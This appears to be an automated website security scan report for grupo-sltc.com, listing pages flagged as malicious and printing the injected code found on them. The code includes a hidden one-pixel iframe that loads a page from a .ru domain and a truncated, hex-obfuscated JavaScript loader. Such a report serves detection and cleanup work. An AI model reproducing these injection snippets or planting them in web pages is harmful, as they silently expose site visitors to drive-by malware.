Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=grupo-sltc.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://grupo-sltc.com/ | 200 OK Content-Length: 5387 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) asq=function(){return n[i];};ww=window;ss=String.fromCharCode;try{document.body=~1}catch(dgsgsdg){zz=12*2+1+1;whwej=12;}{try{whwej=~2;}catch(agdsg){whwej=0;}if(whwej){try{document.body++;}catch(bawetawe){if(ww.document){n="0x29,0x67,0x76,0x6f,0x64,0x75,0x6a,0x70,0x6f,0x21,0x29,0x2a,0x21,0x7c,0xe,0xb,0x21,0x21,0x21,0x21,0x77,0x62,0x73,0x21,0x72,0x6e,0x67,0x6e,0x21,0x3e,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x64,0x73,0x66,0x62,0x75,0x66,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x29,0x28,0x6a Antivirus reports:
| ||
http://grupo-sltc.com/AC_RunActiveContent.js | 200 OK Content-Length: 11947 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function () { var nud = document.createElement('iframe'); nud.src = 'http://vezylgys.ru/count10.php'; nud.style.position = 'absolute'; nud.style.border = '0'; nud.style.height = '1px'; nud.style.width = '1px'; nud.style.left = '1px'; nud.style.top = '1px'; if (!document.getElementById('nud')) { document.write('<div id=\'nud\'></div>'); document.getElementById('nud').appendChild(nud); }})(); Antivirus reports:
| ||
http://grupo-sltc.com/home.html | 200 OK Content-Length: 5203 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) asq=function(){return n[i];};ww=window;ss=String.fromCharCode;try{document.body=~1}catch(dgsgsdg){zz=12*2+1+1;whwej=12;}{try{whwej=~2;}catch(agdsg){whwej=0;}if(whwej){try{document.body++;}catch(bawetawe){if(ww.document){n="0x29,0x67,0x76,0x6f,0x64,0x75,0x6a,0x70,0x6f,0x21,0x29,0x2a,0x21,0x7c,0xe,0xb,0x21,0x21,0x21,0x21,0x77,0x62,0x73,0x21,0x72,0x6e,0x67,0x6e,0x21,0x3e,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x64,0x73,0x66,0x62,0x75,0x66,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x29,0x28,0x6a Antivirus reports:
| ||
http://grupo-sltc.com/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: grupo-sltc.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 26 Dec 2014 20:05:26 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 5387
Content-Type: text/html; charset=ISO-8859-1
...5387 bytes of data.
GET / HTTP/1.1
Host: grupo-sltc.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 26 Dec 2014 20:05:26 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 5387
Content-Type: text/html; charset=ISO-8859-1
...5387 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: grupo-sltc.com
Referer: http://www.google.com/search?q=grupo-sltc.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: grupo-sltc.com
Referer: http://www.google.com/search?q=grupo-sltc.com
Result:
The result is similar to the first query. There are no suspicious redirects found.